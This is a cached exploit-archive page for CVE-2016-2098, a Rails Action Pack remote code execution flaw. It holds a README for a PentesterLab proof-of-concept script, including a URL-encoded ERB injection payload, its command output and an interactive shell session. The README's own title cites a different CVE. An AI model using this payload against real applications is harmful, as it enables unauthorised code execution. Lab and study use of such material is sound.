Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2016-2098 PoC — Ruby on Rails Action Pack 安全漏洞

Source
Associated Vulnerability
Title:Ruby on Rails Action Pack 安全漏洞 (CVE-2016-2098)
Description:Ruby on Rails(Rails)是Rails核心团队开发维护的一套基于Ruby语言的开源Web应用框架,它是由大卫-海纳梅尔-韩森从美国37signals公司的项目管理工具Basecamp里分离出来的。Action Pack是其中的一个用于构建和测试MVC Web应用程序的组件。 Ruby on Rails的Action Pack中存在安全漏洞,该漏洞源于‘render’函数没有充分过滤用户提交的输入。远程攻击者可通过向应用程序发送特制的数据利用该漏洞执行任意Ruby代码。以下版本受到影响:Rub
Description
A PoC of CVE-2016-2098 I made for PentesterLab 
Readme
# CVE-2016-10033-PoC

Wrote this for PentesterLab

> If you are from PentesterLab's don't cheat, it's alot better to learn.

Hope it's useful to someone, if not to me in the future :)

Has interactive shell, nice argparse stuff asw

## Usage
```
usage: script.py [-h] --url URL [--param PARAM] [--proxy] [--raw] [--no-color]
script.py: error: the following arguments are required: --url
```

## Example
```bash
$ python3 script.py --url "http://localhost:8000/pages?id=test"
[+] No parameter specified. Available parameters: ['id']
[+] Testing parameter: id
[+] Testing injection with URL: http://localhost:8000/pages?id[inline]=%3C%25%3D%20%25x%28echo%20SEALLDEV_OUTPUT_%24%28id%29%29%20%25%3E
[+] Injection successful! Test output: uid=1000(webrick) gid=1000(webrick) groups=1000(webrick)
[+] Starting interactive shell...
[+] Type "exit" to quit
--------------------------------------------------
shell> whoami
webrick
```


File Snapshot

[4.0K] /data/pocs/ef1c651540049f5fb0972e755466d533fb7b0e5c ├── [ 34K] LICENSE ├── [ 928] README.md ├── [ 88] requirements.txt └── [5.9K] script.py 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.